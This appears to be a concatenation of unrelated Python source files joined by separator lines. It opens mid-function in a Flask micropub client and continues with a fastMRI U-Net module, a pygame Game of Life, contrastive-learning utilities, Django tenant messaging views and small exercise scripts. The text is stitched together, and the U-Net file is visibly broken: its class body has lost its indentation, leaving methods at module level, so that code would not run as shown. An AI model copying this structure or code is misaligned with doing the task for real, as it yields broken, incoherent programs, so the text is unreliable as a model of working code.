    """Edit an existing post.

    GET: fetch the post's source properties from the micropub endpoint
    and render the edit form. POST: send a micropub "update" action with
    the replacement properties. Requires a session with "update" scope.
    """
    post_id = request.args.get("url")
    if session.get("access_token"):
        user = session["access_token"]
        me = session["me"]
    else:
        return redirect("/login")
    if session.get("scope") and not "update" in session.get("scope").split(" "):
        flash("You do not have permission to update posts.")
        return redirect("/")
    # Infer the post type from its URL path.
    if "/checkin/" in post_id:
        post_type = "checkin"
    elif "/rsvp/" in post_id:
        post_type = "rsvp"
    elif "/webmentions/" in post_id:
        post_type = "reply"
    else:
        post_type = "note"
    try:
        properties = requests.get(ENDPOINT_URL + "?q=source&url=" + post_id,
            headers={"Authorization": f"Bearer {user}"})
        properties = properties.json()
    except:
        abort(404)
    title = "Update a Post"
    if request.method == "POST":
        if me and user:
            data = {
                "action": "update",
                "url": post_id,
                "replace": {}
            }
            # NOTE(review): empty fields are replaced with "" for title
            # but [] for content — confirm the endpoint accepts both.
            if request.form.get("title"):
                data["replace"]["title"] = [request.form.get("title")]
            else:
                data["replace"]["title"] = ""
            if request.form.get("content"):
                data["replace"]["content"] = [request.form.get("content")]
            else:
                data["replace"]["content"] = []
            if request.form.get("image_alt_text"):
                data["replace"]["image_alt_text"] = request.form.get("image_alt_text")
            else:
                data["replace"]["image_alt_text"] = ""
            if request.form.get("category"):
                data["replace"]["category"] = request.form.get("category")
            if request.form.get("is_hidden"):
                data["replace"]["is_hidden"] = [request.form.get("is_hidden")]
            if post_type == "rsvp":
                data["p-rsvp"] = {}
                data["p-rsvp"]["properties"] = {
                    "in-reply-to": properties["properties"]["in-reply-to"],
                    "rsvp": request.form.get("rsvp"),
                    "state": request.form.get("state"),
                    "content": [request.form.get("content")],
                    "event_date": request.form.get("event_date"),
                    "event_time": request.form.get("event_time")
                }
            elif request.form.get("in-reply-to"):
                data["in-reply-to"] = request.form.get("in-reply-to")
            http_request = requests.post(ENDPOINT_URL, json=data, headers={
                "Authorization": f"Bearer {user}", "Content-Type": "application/json"
            })
            try:
                response = http_request.json()
                if http_request.status_code != 200 and http_request.status_code != 201:
                    flash("Error: " + str(response["message"]))
                else:
                    return redirect(http_request.headers["Location"])
            except:
                # Fix: message was garbled by a bad find/replace
                # ("...server errohttp_request.").
                flash("There was an unknown server error.")
            return render_template(
                "post/update_post.html",
                title=title,
                post_type=post_type,
                user=user, me=me,
                id=post_id,
                properties=properties
            )
        return jsonify({"error": "You must be logged in to create a post."}), 401
    # Fix: previously passed the builtin `id` function instead of the
    # post URL to the template.
    return render_template(
        "post/update_post.html",
        title=title,
        post_type=post_type,
        user=user, me=me,
        id=post_id,
        properties=properties
    )
@client.route("/settings")
def settings():
    """Render the settings page for the logged-in user."""
    # Anonymous visitors are sent to the login flow.
    if not session.get("access_token"):
        return redirect("/login")
    user = session["access_token"]
    me = session["me"]
    syndication = session["syndication"] if session.get("syndication") else None
    # The template expects the client id without a trailing slash.
    client_id = CLIENT_ID.strip("/")
    return render_template(
        "user/settings.html",
        title="Settings",
        user=user,
        me=me,
        syndication=syndication,
        client_id=client_id
    )
@client.route("/schemas")
def schemas():
    """Render the schemas page; requires a logged-in session."""
    if not session.get("access_token"):
        return redirect("/login")
    return render_template(
        "user/schemas.html",
        title="Schemas",
        user=session["access_token"],
        me=session["me"]
    )
# use this to forward client-side uploads from /post?type=photo to the /media micropub endpoint
@client.route("/media-forward", methods=["POST"])
def forward_media_query():
    # Require a logged-in session before accepting an upload.
    if not session.get("access_token"):
        return redirect("/login")
    photo = request.files.get("photo")
    if not photo:
        flash("No photo was uploaded. Please upload a photo and try again.")
        return redirect("/post?type=photo")
    # NOTE(review): this second session check is unreachable — the first
    # check above already redirected anonymous requests.
    if not session.get("access_token"):
        return jsonify({"error": "You must be logged in to upload a photo."}), 401
    # Prefer a caller-supplied filename; strip ".." before sanitizing
    # with secure_filename to avoid path traversal.
    if request.form.get("filename"):
        filename = secure_filename(request.form.get("filename").replace("..", ""))
    else:
        filename = secure_filename(photo.filename.replace("..", ""))
    photo.save(os.path.join(UPLOAD_FOLDER, filename))
    # Re-upload the saved file to the micropub media endpoint.
    # NOTE(review): the content type is hard-coded to image/jpeg
    # regardless of the actual file — confirm the endpoint tolerates it.
    http_request = requests.post(
        MEDIA_ENDPOINT_URL,
        files={
            "file": (
                filename,
                open(os.path.join(UPLOAD_FOLDER, filename), "rb"),
                'image/jpeg'
            )
        },
        headers={
            "Authorization": f"Bearer {session['access_token']}"
        }
    )
    if http_request.status_code != 201:
        flash("Error: " + str(http_request.json()["message"]))
        return redirect("/post?type=photo")
    # On success the media endpoint returns the file URL in Location.
    location_header = http_request.headers["Location"]
    return redirect(location_header)
# Static-asset passthrough routes served from the blueprint's static folder.
@client.route("/robots.txt")
def robots():
    return send_from_directory(client.static_folder, "robots.txt")


@client.route("/favicon.ico")
def favicon():
    return send_from_directory(client.static_folder, "favicon.ico")


@client.route("/emojis.json")
def emojis():
    return send_from_directory(client.static_folder, "emojis.json")


@client.route("/manifest.json")
def web_app_manifest():
    # NOTE(review): uses the literal "static" folder rather than
    # client.static_folder like its siblings — confirm this is intended.
    return send_from_directory("static", "manifest.json")


@client.route("/emoji_autocomplete.js")
def emoji_autocomplete():
    return send_from_directory(client.static_folder, "js/emoji_autocomplete.js")
|
python
|
"""Docstring for varnet.py
Normalized U-Net implemetnation for unrolled block network.
"""
import math
from typing import List, Tuple
import fastmri
import torch
import torch.nn as nn
import torch.nn.functional as F
from fastmri.data import transforms
from unet import MHUnet
from att_unet import AttUnet
class NormUnet(nn.Module):
"""PyTorch implementation of a Normalized U-Net model.
This is the same as a regular U-Net, but with normalization applied to the
input before the U-Net. This keeps the values more numerically stable
during training.
Initialization Parameters
-------------------------
chans : int
Number of output channels of the first convolution layer.
num_pools : int
Number of down-sampling and up-sampling layers.
in_chans : int
Number of channels in the input to the U-Net model.
out_chans : int
Number of channels in the output to the U-Net model.
drop_prob : float
Dropout probability.
which_unet : str
One of [trueshare, mhushare, attenshare, split]
task_count : int
Number of dataset tasks
Forward Parameters
------------------
image : tensor
4D tensor
int_task : int
i.e. 0 for div_coronal_pd_fs, 1 for div_coronal_pd
Returns
-------
4D tensor
References
----------
https://github.com/facebookresearch/fastMRI/tree/master/fastmri/models
"""
def __init__(
self,
chans: int,
num_pools: int,
in_chans: int = 2,
out_chans: int = 2,
drop_prob: float = 0.0,
which_unet: str = 'user input required',
task_count: int = None,
):
super().__init__()
assert which_unet in ['trueshare', 'mhushare', 'attenshare', 'split'], "variable which_unet not supported"
if which_unet == 'trueshare' or which_unet == 'split':
decoder_heads = 1
elif which_unet == 'mhushare' or which_unet == 'attenshare':
assert task_count > 1, 'no. tasks must be int > 1 for mhu or att unet'
decoder_heads = task_count
# attentional network is a separate module
if which_unet == 'attenshare':
self.unet = AttUnet(
in_chans = in_chans,
out_chans = out_chans,
chans = chans,
num_pool_layers = num_pools,
drop_prob = drop_prob,
decoder_heads = decoder_heads,
)
# trueshare, mhushare, and split all use the same network
# Differentiation between the three happens in MHUnet or VarNet_MTL
else:
self.unet = MHUnet(
in_chans = in_chans,
out_chans = out_chans,
chans = chans,
num_pool_layers = num_pools,
drop_prob = drop_prob,
decoder_heads = decoder_heads,
)
def complex_to_chan_dim(self, x: torch.Tensor) -> torch.Tensor:
b, c, h, w, two = x.shape
assert two == 2
return x.permute(0, 4, 1, 2, 3).reshape(b, 2 * c, h, w)
def chan_complex_to_last_dim(self, x: torch.Tensor) -> torch.Tensor:
b, c2, h, w = x.shape
assert c2 % 2 == 0
c = c2 // 2
return x.view(b, 2, c, h, w).permute(0, 2, 3, 4, 1).contiguous()
def norm(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]:
# group norm
b, c, h, w = x.shape
x = x.view(b, 2, c // 2 * h * w)
mean = x.mean(dim=2).view(b, c, 1, 1)
std = x.std(dim=2).view(b, c, 1, 1)
x = x.view(b, c, h, w)
return (x - mean) / std, mean, std
def unnorm(
self, x: torch.Tensor, mean: torch.Tensor, std: torch.Tensor
) -> torch.Tensor:
return x * std + mean
def pad(
self, x: torch.Tensor
) -> Tuple[torch.Tensor, Tuple[List[int], List[int], int, int]]:
"""Ensure that dimensions match after rounding errors incurred
during upsampling/downsampling by padding.
"""
_, _, h, w = x.shape
w_mult = ((w - 1) | 15) + 1
h_mult = ((h - 1) | 15) + 1
w_pad = [math.floor((w_mult - w) / 2), math.ceil((w_mult - w) / 2)]
h_pad = [math.floor((h_mult - h) / 2), math.ceil((h_mult - h) / 2)]
# TODO: fix this type when PyTorch fixes theirs
# the documentation lies - this actually takes a list
# https://github.com/pytorch/pytorch/blob/master/torch/nn/functional.py#L3457
# https://github.com/pytorch/pytorch/pull/16949
x = F.pad(x, w_pad + h_pad)
return x, (h_pad, w_pad, h_mult, w_mult)
def unpad(
    self,
    x: torch.Tensor,
    h_pad: List[int],
    w_pad: List[int],
    h_mult: int,
    w_mult: int,
) -> torch.Tensor:
    """Crop away the padding added by `pad`, restoring the original H and W."""
    rows = slice(h_pad[0], h_mult - h_pad[1])
    cols = slice(w_pad[0], w_mult - w_pad[1])
    return x[..., rows, cols]
def forward(
    self,
    x: torch.Tensor,
    int_task: int = 0,
) -> torch.Tensor:
    """Run the U-Net on a complex-valued image.

    Args:
        x: Tensor of shape (b, c, h, w, 2) with real/imag parts in the
            trailing dimension.
        int_task: Task index forwarded to the multi-head U-Net so it can
            select the matching decoder head.

    Returns:
        Tensor with the same (b, c, h, w, 2) layout as the input.
    """
    if not x.shape[-1] == 2:
        raise ValueError("Last dimension must be 2 for complex.")
    # get shapes for unet and normalize
    x = self.complex_to_chan_dim(x)
    x, mean, std = self.norm(x)
    # Pad H/W to multiples of 16 so pooling/upsampling round-trips exactly.
    x, pad_sizes = self.pad(x)
    x = self.unet(
        x, int_task = int_task,
    )
    # get shapes back and unnormalize
    x = self.unpad(x, *pad_sizes)
    x = self.unnorm(x, mean, std)
    x = self.chan_complex_to_last_dim(x)
    return x
|
python
|
import pygame
import numpy as np
from time import sleep
class GameOfLife:
    """Conway's Game of Life rendered with pygame.

    An 800x800 window is divided into a 100x100 grid of cells. ESC toggles
    pause; while paused, left-clicking toggles the cell under the cursor.
    While running, the simulation advances `interval` generations per second.
    """

    def __init__(self):
        pygame.init()
        self.size = 800            # window size in pixels (square)
        self.divisions = 100       # number of grid cells per side
        self.length = self.size // self.divisions  # pixel size of one cell
        self.screen = pygame.display.set_mode((self.size, self.size))
        self.fps = 120             # event-loop frame rate
        self.interval = 10         # generations advanced per second
        self.counter = 0           # frame counter used to pace generations
        self.color_bg = (25, 25, 25)
        self.color_fg = (230, 230, 230)
        # cells[x, y] is True when the cell in grid column x, row y is alive.
        self.cells = np.full((self.divisions, self.divisions), False, dtype=bool)
        self.paused = False

    def play(self):
        """Run the main loop: draw, handle input, and step the simulation."""
        clock = pygame.time.Clock()
        self.draw()
        pygame.display.update()
        while True:
            self.counter += 1
            clock.tick(self.fps)
            self.draw()
            pygame.display.update()
            for event in pygame.event.get():
                if event.type == pygame.QUIT:
                    quit()
            keys = pygame.key.get_pressed()
            if keys[pygame.K_ESCAPE]:
                self.paused = not self.paused
                self.draw()
                pygame.display.update()
                # Debounce: without this sleep, one held key press would
                # toggle pause many times at 120 fps.
                sleep(0.2)
            if self.paused:
                # While paused, a held left button toggles the hovered cell.
                # NOTE(review): the click is not debounced, so holding the
                # button flickers the cell once per frame — confirm intended.
                if pygame.mouse.get_pressed()[0]:
                    pos = pygame.mouse.get_pos()
                    pos = [pos[0] // self.length, pos[1] // self.length]
                    self.cells[pos[0], pos[1]] = not self.cells[pos[0], pos[1]]
                continue
            # Advance one generation every fps // interval frames.
            if self.counter % (self.fps // self.interval) == 0:
                # neighbors_count is padded by one cell on every side so the
                # 3x3 accumulation below never indexes out of bounds; entry
                # [i+1, j+1] corresponds to cell (i, j).
                neighbors_count = np.full((self.divisions + 2, self.divisions + 2), 0, dtype=np.int8)
                for i in range(self.divisions):
                    for j in range(self.divisions):
                        if self.cells[i, j]:
                            # Add 1 to the whole 3x3 block around (i, j) ...
                            for i2 in range(i, i+3):
                                for j2 in range(j, j+3):
                                    neighbors_count[i2, j2] += 1
                            # ... then remove the cell's own contribution.
                            neighbors_count[i+1, j+1] -= 1
                for i in range(self.divisions):
                    for j in range(self.divisions):
                        if self.cells[i, j]:
                            # A live cell survives only with 2 or 3 neighbors.
                            if neighbors_count[i+1, j+1] not in {2, 3}:
                                self.cells[i, j] = False
                        else:
                            # A dead cell with exactly 3 neighbors is born.
                            if neighbors_count[i+1, j+1] == 3:
                                self.cells[i, j] = True

    def draw(self):
        """Paint the background and every live cell onto the screen surface."""
        pygame.draw.rect(
            self.screen,
            self.color_bg,
            pygame.Rect(0, 0, self.size, self.size)
        )
        for i in range(self.divisions):
            for j in range(self.divisions):
                if self.cells[i, j]:
                    pygame.draw.rect(
                        self.screen,
                        self.color_fg,
                        pygame.Rect(i * self.length, j * self.length, self.length, self.length)
                    )
if __name__ == "__main__":
    # Script entry point: build the game and hand control to its event loop.
    GameOfLife().play()
|
python
|
import numpy as np
import torch
import torchvision
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from sklearn.manifold import TSNE
import os
from .model import resnet
from PIL import ImageFilter
import random
def adjust_learning_rate(args, optimizer, epoch, lr):
    """Step-decay the learning rate and write it into every param group.

    The base `lr` is multiplied by args.lr_decay_rate once for every
    milestone in args.lr_decay_epochs that `epoch` has passed.
    """
    n_steps = np.sum(epoch > np.asarray(args.lr_decay_epochs))
    if n_steps > 0:
        lr = lr * args.lr_decay_rate ** n_steps
    for group in optimizer.param_groups:
        group['lr'] = lr
class AverageMeter(object):
    """Tracks the most recent value and a running (weighted) average."""

    def __init__(self):
        self.reset()

    def reset(self):
        """Clear all accumulated statistics."""
        self.val = 0
        self.avg = 0
        self.sum = 0
        self.count = 0

    def update(self, val, n=1):
        """Record `val` observed `n` times and refresh the running average."""
        self.val = val
        self.sum += n * val
        self.count += n
        self.avg = self.sum / self.count
def accuracy(output, target, topk=(1,)):
    """Compute the accuracy over the k top predictions for the specified values of k.

    Args:
        output: (batch, num_classes) score tensor.
        target: (batch,) tensor of class indices.
        topk: tuple of k values to evaluate.

    Returns:
        List of 1-element tensors, each the top-k accuracy in percent.
    """
    with torch.no_grad():
        maxk = max(topk)
        batch_size = target.size(0)
        _, pred = output.topk(maxk, 1, True, True)
        pred = pred.t()
        correct = pred.eq(target.view(1, -1).expand_as(pred))
        res = []
        for k in topk:
            # BUG FIX: use reshape instead of view — slices of the transposed
            # prediction matrix can be non-contiguous, and .view raises a
            # RuntimeError on non-contiguous tensors in newer PyTorch.
            correct_k = correct[:k].reshape(-1).float().sum(0, keepdim=True)
            res.append(correct_k.mul_(100.0 / batch_size))
        return res
def ERG(arr, k=2):
    """Prune the k rows/columns with the largest column sums, then pick again.

    Returns (argmax of the column sums after pruning, indices of the k
    pruned columns). `arr` itself is not modified.
    """
    pruned = arr.copy()
    # Indices of the k columns with the largest sums in the original matrix.
    top_idx = np.argsort(pruned.sum(axis=0))[-k:]
    for idx in top_idx:
        pruned[idx, :] = 0
        pruned[:, idx] = 0
    return pruned.sum(axis=0).argmax(), top_idx
def get_tsne_feature(model, loader, device, opt):
    """Extract features for every batch in `loader` and stack them for t-SNE.

    Returns (features, labels, room_names, image_names) as numpy arrays,
    concatenated over all batches.

    NOTE(review): `feat` is only assigned when opt.mode is 'label' or
    'self'; any other mode raises NameError below — confirm allowed modes.
    """
    model.eval()
    with torch.no_grad():
        for idx, (image, label, room_name, image_name) in enumerate(loader):
            if torch.cuda.is_available():
                image = image.to(device)
                label = label.to(device)
            # Both modes currently run the same forward pass; presumably kept
            # separate for future divergence — confirm.
            if opt.mode == 'label':
                feat, _ = model(image)
            elif opt.mode == 'self':
                feat, _ = model(image)
            feat = feat.detach().cpu().numpy()
            label = label.cpu().numpy()
            room_name = np.array(room_name)
            image_name = np.array(image_name)
            # Per-batch similarity diagnostics: print the image most similar
            # to the rest, before and after ERG pruning of dominant samples.
            sim = np.matmul(feat, feat.T)
            np.fill_diagonal(sim, 0)
            index = sim.sum(axis=0).argmax()
            new_index, ex = ERG(sim, 3)
            print(image_name[index], image_name[new_index])
            print(image_name[ex])
            # First batch initializes the accumulators; later batches append.
            if idx == 0:
                tsne_data = feat
                tsne_label = label
                tsne_room_name = room_name
                tsne_image_name = image_name
            else:
                tsne_data = np.concatenate((tsne_data, feat), axis=0)
                tsne_label = np.concatenate((tsne_label, label), axis=0)
                tsne_room_name = np.concatenate((tsne_room_name, room_name), axis=0)
                tsne_image_name = np.concatenate((tsne_image_name, image_name), axis=0)
    return tsne_data, tsne_label, tsne_room_name, tsne_image_name
def plot_tsne(data, label, room_name, image_name):
    """Project features to 2-D with t-SNE and scatter-plot two random rooms.

    Returns the (data, image_name, label, room_name) rows belonging to the
    two sampled rooms. NOTE(review): room selection uses random.sample, so
    repeated calls plot different rooms unless `random` is seeded; plt.show()
    blocks until the window is closed.
    """
    # Shadows the module-level `matplotlib.cm` import; only the colormap
    # object is needed here.
    cm = plt.get_cmap('gist_rainbow')
    NUM_COLORS = 2
    color = [cm(1. * i / NUM_COLORS) for i in range(NUM_COLORS)]
    tsne = TSNE(n_components=2, random_state=0)
    # Overwrites `data` with its 2-D embedding.
    data = tsne.fit_transform(data)
    # room = ['FloorPlan26', 'FloorPlan227', 'FloorPlan328', 'FloorPlan429', 'FloorPlan30']
    kitchen_room = ['FloorPlan26', 'FloorPlan27', 'FloorPlan28', 'FloorPlan29', 'FloorPlan30']
    living_room = ['FloorPlan226', 'FloorPlan227', 'FloorPlan228', 'FloorPlan229', 'FloorPlan230']
    bed_room = ['FloorPlan326', 'FloorPlan327', 'FloorPlan328', 'FloorPlan329', 'FloorPlan330']
    bath_room = ['FloorPlan426', 'FloorPlan427', 'FloorPlan428', 'FloorPlan429', 'FloorPlan430']
    # room = []
    # room.append(random.sample(kitchen_room, 1))
    # room.append(random.sample(living_room, 1))
    # room.append(random.sample(bed_room, 1))
    # room.append(random.sample(bath_room, 1))
    total_room = ['FloorPlan26', 'FloorPlan27', 'FloorPlan28', 'FloorPlan29', 'FloorPlan30', 'FloorPlan226', 'FloorPlan227', 'FloorPlan228', 'FloorPlan229', 'FloorPlan230', 'FloorPlan326', 'FloorPlan327', 'FloorPlan328', 'FloorPlan329', 'FloorPlan330', 'FloorPlan426', 'FloorPlan427', 'FloorPlan428', 'FloorPlan429', 'FloorPlan430']
    # Pick two rooms at random to visualize.
    room = random.sample(total_room, 2)
    plt.figure(figsize=(12, 10))
    for i in range(2):
        # Collect the rows of the selected rooms (first room initializes,
        # second one appends) while plotting each room's points.
        if i == 0:
            output_data = data[room_name==room[i]]
            output_label = label[room_name==room[i]]
            output_image_name = image_name[room_name==room[i]]
            output_room_name = room_name[room_name==room[i]]
        else:
            output_data = np.concatenate((output_data, data[room_name==room[i]]), axis=0)
            output_label = np.concatenate((output_label, label[room_name==room[i]]), axis=0)
            output_image_name = np.concatenate((output_image_name, image_name[room_name==room[i]]), axis=0)
            output_room_name = np.concatenate((output_room_name, room_name[room_name==room[i]]), axis=0)
        plt.scatter(data[room_name==room[i], 0], data[room_name==room[i], 1], marker='.', label=room[i], c=color[i])
    plt.legend()
    plt.show()
    return output_data, output_image_name, output_label, output_room_name
def save_model(model, optimizer, epoch, model_path):
    """Persist model/optimizer state dicts and the epoch number.

    The checkpoint is written to <model_path>/best_model.pth; the directory
    is created if needed.
    """
    print('==> Saving...')
    if not os.path.exists(model_path):
        os.makedirs(model_path)
    checkpoint = {
        'model': model.state_dict(),
        'optimizer': optimizer.state_dict(),
        'epoch': epoch,
    }
    torch.save(checkpoint, os.path.join(model_path, "best_model.pth"))
def set_model(opt, device):
    """Build the backbone, optionally warm-start it, and move it to `device`.

    opt.mode selects the architecture: 'label' -> project resnet18 with a
    4-class head, 'self' -> project resnet50. When opt.pretrained is empty,
    the 'label' model is warm-started from torchvision's ImageNet resnet18
    (downloads weights on first use); otherwise the checkpoint at
    opt.pretrained is loaded non-strictly.
    """
    if opt.mode == 'label':
        model = resnet.resnet18(num_classes=4, opt=opt)
        # model = resnet.resnet50(num_classes=4, opt=opt)
    elif opt.mode == 'self':
        model = resnet.resnet50(opt=opt)
    # NOTE(review): any other opt.mode leaves `model` unbound and the code
    # below raises NameError — confirm allowed modes upstream.
    if opt.pretrained == '':
        if opt.mode == 'label':
            # Copy every ImageNet-pretrained layer except the final fc head
            # (the project model keeps its own 4-class head).
            pretrained_model = torchvision.models.resnet18(pretrained=True)
            # pretrained_model = torchvision.models.resnet50(pretrained=True)
            model.conv1.load_state_dict(pretrained_model.conv1.state_dict())
            model.bn1.load_state_dict(pretrained_model.bn1.state_dict())
            model.relu.load_state_dict(pretrained_model.relu.state_dict())
            model.maxpool.load_state_dict(pretrained_model.maxpool.state_dict())
            model.layer1.load_state_dict(pretrained_model.layer1.state_dict())
            model.layer2.load_state_dict(pretrained_model.layer2.state_dict())
            model.layer3.load_state_dict(pretrained_model.layer3.state_dict())
            model.layer4.load_state_dict(pretrained_model.layer4.state_dict())
            model.avgpool.load_state_dict(pretrained_model.avgpool.state_dict())
        else:
            # Self-supervised mode trains from scratch.
            pass
    else:
        checkpoint = torch.load(opt.pretrained)
        # strict=False tolerates head/projection mismatches between runs.
        model.load_state_dict(checkpoint['model'], strict=False)
    if torch.cuda.is_available():
        if torch.cuda.device_count() > 1:
            print(torch.cuda.device_count(), 'Multi GPU running')
            model = torch.nn.DataParallel(model)
    model = model.to(device)
    return model
class GaussianBlur(object):
    """Gaussian blur augmentation in SimCLR https://arxiv.org/abs/2002.05709

    `sigma` is a [low, high] range; each call samples a radius uniformly
    from it and blurs the given PIL image.
    """

    def __init__(self, sigma=[.1, 2.]):
        self.sigma = sigma

    def __call__(self, x):
        low, high = self.sigma[0], self.sigma[1]
        radius = random.uniform(low, high)
        return x.filter(ImageFilter.GaussianBlur(radius=radius))
|
python
|
# Read an integer and print four numbers stepping by 2:
# start from x + 1 when x is even, from x itself when x is odd,
# so the printed sequence is always four consecutive odd numbers.
# (Replaces four copy-pasted print/increment pairs with one loop.)
x = int(input())
y = x + 1 if x % 2 == 0 else x
for _ in range(4):
    print(y)
    y = y + 2
|
python
|
from datetime import datetime
from django.utils import timezone
from django.shortcuts import render, get_object_or_404
from django.db.models import Q
from django.contrib.auth.models import User, Group
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
from django.http import HttpResponseBadRequest, HttpResponseRedirect
from django.views.decorators.http import condition
from foundation_public.models.organization import PublicOrganization
from tenant_profile.decorators import tenant_profile_required
from tenant_intake.decorators import tenant_intake_required
from tenant_reception.decorators import tenant_reception_required
from tenant_configuration.decorators import tenant_configuration_required
from foundation_tenant.decorators import tenant_required
from foundation_tenant.models.base.message import Message
from foundation_tenant.models.base.me import Me
from smegurus import constants
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
def inbox_page(request):
    """Render the inbox with one row per conversation partner.

    A message whose 'participants' still contains the viewer has not been
    archived, so the filter below excludes archived threads.
    """
    conversations = Message.objects.filter(
        recipient=request.tenant_me,
        participants=request.tenant_me,
    ).distinct('participants')
    return render(request, 'tenant_message/message/master_view.html', {
        'page': 'inbox',
        'messages': conversations,
    })
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
def compose_page(request):
    """Render the generic composer with recipient candidates grouped by role."""
    role_groups = {
        'entrepreneurs': constants.ENTREPRENEUR_GROUP_ID,
        'mentors': constants.MENTOR_GROUP_ID,
        'advisors': constants.ADVISOR_GROUP_ID,
        'managers': constants.ORGANIZATION_MANAGER_GROUP_ID,
        'admins': constants.ORGANIZATION_ADMIN_GROUP_ID,
    }
    # One lazy queryset per role; evaluated by the template.
    context = {name: Me.objects.filter(owner__groups__id=group_id)
               for name, group_id in role_groups.items()}
    context['page'] = 'composer'
    context['recipient_id'] = 0
    return render(request, 'tenant_message/composer/generic_view.html', context)
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
def specific_compose_page(request, id):
    """Render the composer pre-addressed to the Me with primary key `id`."""
    role_groups = {
        'entrepreneurs': constants.ENTREPRENEUR_GROUP_ID,
        'mentors': constants.MENTOR_GROUP_ID,
        'advisors': constants.ADVISOR_GROUP_ID,
        'managers': constants.ORGANIZATION_MANAGER_GROUP_ID,
        'admins': constants.ORGANIZATION_ADMIN_GROUP_ID,
    }
    # One lazy queryset per role; evaluated by the template.
    context = {name: Me.objects.filter(owner__groups__id=group_id)
               for name, group_id in role_groups.items()}
    context['page'] = 'composer'
    # 404 early if the requested recipient does not exist.
    context['recipient'] = get_object_or_404(Me, pk=id)
    return render(request, 'tenant_message/composer/specific_view.html', context)
@login_required()
@tenant_required
def latest_conversation_details(request, sender_id):
    """Return the last-modified timestamp of the conversation with `sender_id`.

    Looks at messages in either direction that the viewer still participates
    in; intended for HTTP conditional-response helpers. Raises
    Message.DoesNotExist when no such message exists.
    """
    return Message.objects.filter(
        Q(
            recipient=request.tenant_me,
            sender_id=int(sender_id),
            participants=request.tenant_me
        ) | Q(
            recipient_id=int(sender_id),
            # BUG FIX: request.tenant_me is a Me instance, so it must be
            # matched against the 'sender' relation, not the raw integer
            # 'sender_id' column (which would fail to coerce the instance).
            sender=request.tenant_me,
            participants=request.tenant_me
        )
    ).latest("last_modified").last_modified
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
def conversation_page(request, sender_id):
    """Show the two-way conversation with `sender_id`, oldest first.

    Messages received by the viewer are stamped with a read time as a side
    effect of rendering the page.
    """
    messages = Message.objects.filter(
        Q(
            recipient=request.tenant_me,
            sender_id=int(sender_id),
            participants=request.tenant_me
        ) | Q(
            recipient_id=int(sender_id),
            # BUG FIX: request.tenant_me is a Me instance, so it must be
            # matched against the 'sender' relation, not 'sender_id'.
            sender=request.tenant_me,
            participants=request.tenant_me
        )
    ).order_by("created")
    # Recipients have the ability to update the 'date_read'.
    for message in messages.all():
        if message.recipient == request.tenant_me:
            # Give the message the read-time (timezone-aware).
            message.date_read = timezone.now()
            message.save()
    return render(request, 'tenant_message/message/details_view.html',{
        'page': 'inbox',
        'messages': messages,
        'sender_id': sender_id,
    })
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
def archive_conversation_page(request, sender_id):
    """Archive the conversation with `sender_id`, then return to the inbox.

    Archiving is modelled by removing the viewer from every message's
    'participants' relation.
    """
    messages = Message.objects.filter(
        Q(
            recipient=request.tenant_me,
            sender_id=int(sender_id),
            participants=request.tenant_me
        ) | Q(
            recipient_id=int(sender_id),
            # BUG FIX: request.tenant_me is a Me instance, so it must be
            # matched against the 'sender' relation, not 'sender_id'.
            sender=request.tenant_me,
            participants=request.tenant_me
        )
    ).order_by("created")
    # Remove the viewer from each conversation message (a.k.a. archive it).
    for message in messages.all():
        message.participants.remove(request.tenant_me)
        # save() after an m2m remove is redundant but harmless; kept to
        # trigger any save-time signals the project may rely on.
        message.save()
    # Redirect back to the inbox.
    return HttpResponseRedirect(reverse('tenant_message_inbox'))
@login_required()
@tenant_required
def latest_archived_message_master(request):
    """Return the last-modified timestamp of the newest archived message.

    Used for HTTP conditional caching of the archive list. Falls back to
    the current time when no archived message exists.
    """
    try:
        return Message.objects.filter(
            Q(
                recipient=request.tenant_me
            ) &~  # and not
            Q(
                participants=request.tenant_me
            )
        ).latest("last_modified").last_modified
    except Message.DoesNotExist:
        # BUG FIX: use timezone.now() (aware) instead of datetime.now()
        # (naive) — the rest of this module stores aware timestamps, and
        # mixing the two breaks comparisons under USE_TZ.
        return timezone.now()
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
# @condition(last_modified_func=latest_archived_message_master)
def archive_list_page(request):
    """List archived conversations, one row per sender.

    A thread counts as archived when the viewer received it but is no
    longer in its 'participants' relation.
    """
    archived = Message.objects.filter(
        Q(recipient=request.tenant_me) & ~Q(participants=request.tenant_me)
    ).distinct('participants')
    return render(request, 'tenant_message/archive/master_view.html', {
        'page': 'archive',
        'messages': archived,
    })
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
def archive_details_page(request, sender_id):
    """Show the archived conversation with `sender_id` (threads the viewer left)."""
    messages = Message.objects.filter(
        Q(
            Q(
                recipient=request.tenant_me,
                sender_id=int(sender_id),
            ) &~  # and not
            Q(
                participants=request.tenant_me
            )
        ) |
        Q(
            Q(
                recipient_id=int(sender_id),
                # BUG FIX: request.tenant_me is a Me instance, so it must be
                # matched against the 'sender' relation, not 'sender_id'.
                sender=request.tenant_me,
            ) &~  # and not
            Q(
                participants=request.tenant_me
            )
        )
    ).order_by("created")
    return render(request, 'tenant_message/archive/details_view.html',{
        'page': 'archive',
        'messages': messages,
        'sender_id': sender_id,
    })
|
python
|
# https://leetcode.com/problems/palindrome-number/
class Solution:
    def isPalindrome(self, x: int) -> bool:
        """Return True if the integer x reads the same forwards and backwards.

        Negative numbers are never palindromes. Uses pure integer arithmetic
        (no string conversion): reverses the digits and compares with x.
        """
        if x < 0:
            return False
        remaining, reversed_digits = x, 0
        while remaining:
            reversed_digits = reversed_digits * 10 + remaining % 10
            # BUG FIX: the original `int(p / 10)` uses float division, which
            # silently corrupts digits once x exceeds 2**53; floor division
            # is exact for arbitrarily large ints.
            remaining //= 10
        return reversed_digits == x
